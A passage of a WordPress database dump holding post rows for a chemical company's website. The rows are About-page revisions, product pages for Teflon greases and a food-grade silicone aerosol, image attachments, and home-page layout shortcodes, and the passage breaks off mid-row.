INSERT INTO `wp_posts` VALUES (1091, 2, '2016-08-30 19:10:20', '2016-08-30 19:10:20', '', 'krytox-gpl-series', '', 'inherit', 'open', 'closed', '', 'krytox-gpl-series', '', '', '2016-08-30 19:10:20', '2016-08-30 19:10:20', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-gpl-series.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1092, 3, '2016-08-30 19:52:56', '2016-08-30 19:52:56', '[row]\n\n[col span="1/2"]\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\n\n[/col]\n\n[col span="1/2"]\n\n[ux_image id="218" image_size="thumbnail" drop_shadow="1"]\n\n[/col]\n\n[col span="1/1"]\n<h3>On The Cutting Edge of the Performance Chemical Market</h3>\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation intelligence to develop a specialized solution to meet your needs.\n\n[/col]\n\n[/row]\n\n[row]\n\n[col span="1/3"]\n\n[ux_image id="247"]\n\n[/col]\n\n[col span="1/3"]\n\n[ux_image id="142"]\n\n[/col]\n\n[col span="1/3"]\n\n[ux_image id="87"]\n\n[/col]\n\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-autosave-v1', '', '', '2016-08-30 19:52:56', '2016-08-30 19:52:56', '', 204, 'https://132.148.10.86/wordpress/204-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1093, 3, '2016-08-30 19:53:39', '2016-08-30 19:53:39', '[row]\r\n\r\n[col span="1/2"]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="218" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n<h3>On The Cutting Edge of the Performance Chemical Market</h3>\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="247"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-30 19:53:39', '2016-08-30 19:53:39', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1094, 3, '2016-08-30 19:54:40', '2016-08-30 19:54:40', '[row]\r\n\r\n[col span="1/1"]\r\n<h3>On The Cutting Edge of the Performance Chemical Market</h3>\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="218" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="247"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-30 19:54:40', '2016-08-30 19:54:40', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1095, 3, '2016-08-30 19:57:23', '2016-08-30 19:57:23', '', 'ABOUT Miller-stephenson', '', 'inherit', 'open', 'closed', '', 'about-miller-stephenson', '', '', '2016-08-30 19:57:23', '2016-08-30 19:57:23', '', 204, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ABOUT-Miller-stephenson-.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1096, 3, '2016-08-30 19:57:44', '2016-08-30 19:57:44', '[row]\r\n\r\n[col span="1/1"]\r\n<h3>On The Cutting Edge of the Performance Chemical Market</h3>\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="1095" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="247"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-30 19:57:44', '2016-08-30 19:57:44', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1097, 2, '2016-08-31 12:26:24', '2016-08-31 12:26:24', '<h3>Teflon Heavy Equipment Grease | Formulated for extreme conditions encountered in highway construction, farming, mining and trucking</h3>\r\nHeavy Equipment Grease with Teflon™ fluoropolymer is formulated to meet the extreme conditions encountered on off-highway construction equipment, as well as the demands of heavy equipment used in farming, mining and trucking. Formulated with high viscosity base oils, thickened with a lithium complex binder, and fortified with both molybdenum disulfide and Teflon™ fluoropolymer to deliver load carrying and anti-wear\r\nperformance.\r\n\r\nHeavy Equipment Grease with Teflon™ fluoropolymer contains a blend of extreme pressure and anti-wear additives, and rust and oxidation inhibitors for wet conditions. A dropping point of 500ºF (260ºC) ensures retention in high temperature applications. Recommended operating temperature range: -10ºF (-23ºC) to 350ºF (177ºC).\r\n\r\nNote: not recommended for automotive applications.\r\n\r\nFeatures:\r\n\r\n• Film strength &amp; mechanical stability\r\n• Protection against wear &amp; shock loads\r\n• Low water washout (5%)\r\n• Operating temperature range: -10ºF (-23ºC) to 350ºF (177ºC)\r\n• Contains 3% molybdenum\r\n• Meets NLGI #2\r\n\r\nDirections For Use:\r\nFor best results, remove old grease before applying.', 'Teflon Heavy Equipment Grease', 'DuPont® Heavy Equipment Grease with Teflon® fluoropolymer is formulated to meet the extreme conditions encountered on off-highway construction equipment, as well as the demands of heavy equipment used in farming, mining and trucking. Formulated with high viscosity base oils, thickened with a lithium complex binder, and fortified with both molybdenum disulfide and Teflon® fluoropolymer to deliver load carrying and anti-wear performance.\r\n\r\nContains 3% molybdenum.\r\n\r\nNote: not recommended for automotive applications.', 'publish', 'open', 'closed', '', 'teflon-heavy-equipment-grease', '', '', '2016-12-21 15:14:40', '2016-12-21 15:14:40', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1097', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1098, 2, '2016-08-31 12:26:06', '2016-08-31 12:26:06', '', 'Teflon Heavy Equipment Grease', '', 'inherit', 'open', 'closed', '', 'shutterstock_166416101', '', '', '2016-12-21 13:52:02', '2016-12-21 13:52:02', '', 1097, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_166416101.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1099, 2, '2016-08-31 12:27:43', '2016-08-31 12:27:43', '', 'shutterstock_106756229', '', 'inherit', 'open', 'closed', '', 'shutterstock_106756229', '', '', '2016-08-31 12:27:43', '2016-08-31 12:27:43', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_106756229.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1100, 2, '2016-08-31 12:36:12', '2016-08-31 12:36:12', '<h3>TriboSys™ 2200 | Food Grade Silicone Aerosol</h3>\r\nTriboSys™ 2200 is a multi-purpose food grade silicone aerosol, NSF Registered spray lubricant for all industries. It can be safely used on machinery used for producing, manufacturing, packing, processing, preparing, treating, packaging, transporting, or holding food.\r\n\r\nIt may be used on food-processing equipment as a protective anti-rust film and prevent corrosion buildup problems. It works well as a release agent on gaskets and seals for tank closures and as a dry lubricant for machine parts and equipment where there is incidental contact with food. It prevents sticking and retards tarnish. It stops squeaks and also waterproofs, while prolonging the life of rubber components and other materials.\r\n\r\nTypical Applications:\r\nHinges, Latches, Chains, Rollers, Casters, Wheels, Delivery Chutes, Table Tops, Packaging Slides, Belts, Doors, Locks, Rubber Moldings, Drawers, and many other miscellaneous parts and equipment.\r\n\r\n<strong>Advantages</strong>\r\nLubricates\r\nResists Rust and Corrosion\r\nWaterproofs\r\n\r\n<strong>Technical Service:</strong>\r\nTo select the most suitable lubricant for your application please call Technical Service at 800.992.2424 (8-4 Eastern Time). In Canada, call 800.323.4621 (8-4 Eastern Time)', 'TriboSys™  2200 | Food Grade Silicone Aerosol', 'TriboSys 2200 is a multi-purpose, NSF Registered spray lubricant for all industries. It can be safely used on machinery used for producing, manufacturing, packing, processing, preparing, treating, packaging, transporting, or holding food. It may be used on food-processing equipment as a protective anti-rust film and prevent corrosion buildup problems.', 'publish', 'open', 'closed', '', 'tribosys-2200-food-grade-silicone-aerosol', '', '', '2016-12-21 18:35:02', '2016-12-21 18:35:02', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1100', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1101, 2, '2016-08-31 12:35:31', '2016-08-31 12:35:31', '', 'Food Grade Silicone Aerosol', '', 'inherit', 'open', 'closed', '', 'tribosys_grease_food_grade', '', '', '2016-12-21 16:34:51', '2016-12-21 16:34:51', '', 1100, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/tribosys_grease_food_grade.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1102, 2, '2016-08-31 13:08:46', '2016-08-31 13:08:46', '<h3>Teflon High Temp Grease | Red synthetic blend extreme-pressure, high-speed grease</h3>\r\nHigh Temp Grease with Teflon™ fluoropolymer is a lithium complex, semisynthetic grease. This grease has a dropping point in excess of 500°F, which insures optimal retention in high temperature applications.  Formulated with carefully chosen additives, including Teflon™ fluoropolymer, to insure high film strength, and extreme pressure and anti-wear properties. Operating temperature range: -40ºF (-40°C) to 350ºF (177°C).\r\n\r\nSemi-synthetic base oils, combined with anti-oxidants and corrosion inhibitors enhance the performance in drum and high-temp disc brake wheel bearings, fifth wheels, chassis components, U-joints, king pins, clutch bearings, ball and roller bearings. Cross-over industrial uses include applications where lithium, lithium complex and extreme pressure greases are specified.\r\n\r\n<strong>Features</strong>\r\n\r\n• Film strength and durability\r\n• Withstands extreme pressure and heavy loads\r\n• Water washout (7%)\r\n• Extreme pressure and anti-wear properties\r\n• Operating temperature range: -40ºF (-40ºC) to 350ºF (177ºC)\r\n• Contains rust and corrosion inhibitors\r\n• Meets NLGI #2 Service Classification GC-LB (ASTM D-4950)', 'Teflon High Temp Grease', 'DuPont® High Temp Grease with Teflon® fluoropolymer is a lithium complex, semi synthetic grease. This grease has a dropping point in excess of 500°F, which insures optimal retention in high temperature applications. Formulated with carefully chosen additives, including Teflon® fluoropolymer, to insure high film strength, and extreme pressure and anti-wear properties.\r\n\r\nContains rust and corrosion inhibitors.', 'publish', 'open', 'closed', '', 'teflon-high-temp-grease', '', '', '2016-12-21 15:23:58', '2016-12-21 15:23:58', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1102', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1103, 2, '2016-08-31 13:05:45', '2016-08-31 13:05:45', '', 'High Temp Grease', '', 'inherit', 'open', 'closed', '', 'shutterstock_215450284', '', '', '2016-12-21 15:19:34', '2016-12-21 15:19:34', '', 1102, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_215450284.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1104, 2, '2016-08-31 13:44:35', '2016-08-31 13:44:35', '<h3>Teflon Severe Service Grease | High performance grease for factory application</h3>\r\nSevere Service Grease with Teflon™ fluoropolymer is an industrial grade grease formulated for maximum water repellency and boundary lubrication protection. This grease provides lubricity, thermal stability (-40ºF to 350ºF), and rust and corrosion protection, especially in salt water and high moisture applications. Water washout and mechanical stability properties surpass lithium complex greases, making this grease ideal for high load and high contamination applications.\r\n\r\nThis multi-functional industrial grease is well suited for most industrial applications, and especially for high temperature bearings, bushings, and gear couplings used in mining, steel mill and construction equipment. A dropping point of 572ºF (300ºC) ensures optimal retention in these high temperature applications.\r\n\r\nNote: Not recommended for automotive bearing applications\r\n\r\n<strong>Features</strong>\r\n\r\n• Improves service life\r\n• Withstands extreme pressures, high heat, shock loads and continuous vibration\r\n• Low water washout (2.75%)\r\n• Operating temperature range: -40ºF (-40ºC) to 350ºF (177ºC)\r\n• Contains rust and corrosion inhibitors to protect against the effects of salt water\r\n• Meets NLGI #2', 'Teflon Severe Service Grease', 'DuPont® Severe Service Grease with Teflon® fluoropolymer is an industrial grade grease formulated for maximum water repellency and boundary lubrication protection. This grease provides lubricity, thermal stability (-40ºF to 350ºF), and rust and corrosion protection, especially in salt water and high moisture applications. Water washout and mechanical stability properties surpass lithium complex greases, making this grease ideal for high load and high contamination applications.\r\n\r\nNote: Not recommended for automotive bearing applications.', 'publish', 'open', 'closed', '', 'teflon-severe-service-grease', '', '', '2016-12-21 15:37:27', '2016-12-21 15:37:27', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1104', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1105, 2, '2016-08-31 13:44:14', '2016-08-31 13:44:14', '', 'Severe Service Grease', '', 'inherit', 'open', 'closed', '', 'shutterstock_318689024', '', '', '2016-12-21 15:35:11', '2016-12-21 15:35:11', '', 1104, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_318689024.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1106, 2, '2016-08-31 14:03:26', '2016-08-31 14:03:26', '<h3>Teflon White Lithium Grease | A clean, white general purpose grease for demanding applications</h3>\r\nWhite Lithium Grease with Teflon™ fluoropolymer is formulated with a special additive package which insures high film strength, extreme pressure (EP) and anti-wear properties as well as corrosion prevention. This is a clean, white, low odor grease, making it user friendly.\r\n\r\nThis general purpose grease provides long lasting protection in a broad range of applications and operating conditions. With a high dropping point in excess of 500°F, this grease ensures retention where high temperatures are encountered. Recommended Operating temperature range: -40ºF (-40ºC) to 350ºF (177ºC).\r\n\r\nUses include chassis, seat tracks, speedometer cables, trunk &amp; hood latches, door hinges, stop latches, assembly applications, garage doors, conveyor bearings, and more.\r\n\r\n<strong>Features:</strong>\r\n\r\n• Film strength and durability\r\n• Protection against oxidation &amp; corrosion\r\n• Water washout (7%)\r\n• Extreme pressure and anti-wear properties\r\n• Operating temperature range: -40ºF (-40ºC) to 350ºF (177ºC)\r\n• Meets NLGI #2', 'Teflon White Lithium Grease', 'DuPont® White Lithium Grease with Teflon® fluoropolymer is formulated with a special additive package which insures high film strength, extreme pressure (EP) and anti-wear properties as well as corrosion prevention. This is a clean, white, low odor grease, making it user friendly.', 'publish', 'open', 'closed', '', 'teflon-white-lithium-grease', '', '', '2016-12-21 15:53:45', '2016-12-21 15:53:45', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1106', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1107, 2, '2016-08-31 14:00:08', '2016-08-31 14:00:08', '', 'White Lithium Grease', '', 'inherit', 'open', 'closed', '', 'shutterstock_27998426', '', '', '2016-12-21 15:48:24', '2016-12-21 15:48:24', '', 1106, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_27998426.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1108, 2, '2016-08-31 14:21:49', '2016-08-31 14:21:49', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="chemicals/krytox/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZORADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 50 years of knowledge &amp; experience, Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-31 14:21:49', '2016-08-31 14:21:49', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1109, 2, '2016-08-31 14:28:33', '2016-08-31 14:28:33', '', 'tribosys_grease1', '', 'inherit', 'open', 'closed', '', 'tribosys_grease1', '', '', '2016-08-31 14:28:33', '2016-08-31 14:28:33', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/tribosys_grease1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1110, 2, '2016-08-31 14:49:07', '2016-08-31 14:49:07', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZORADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 50 years of knowledge &amp; experience, Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col 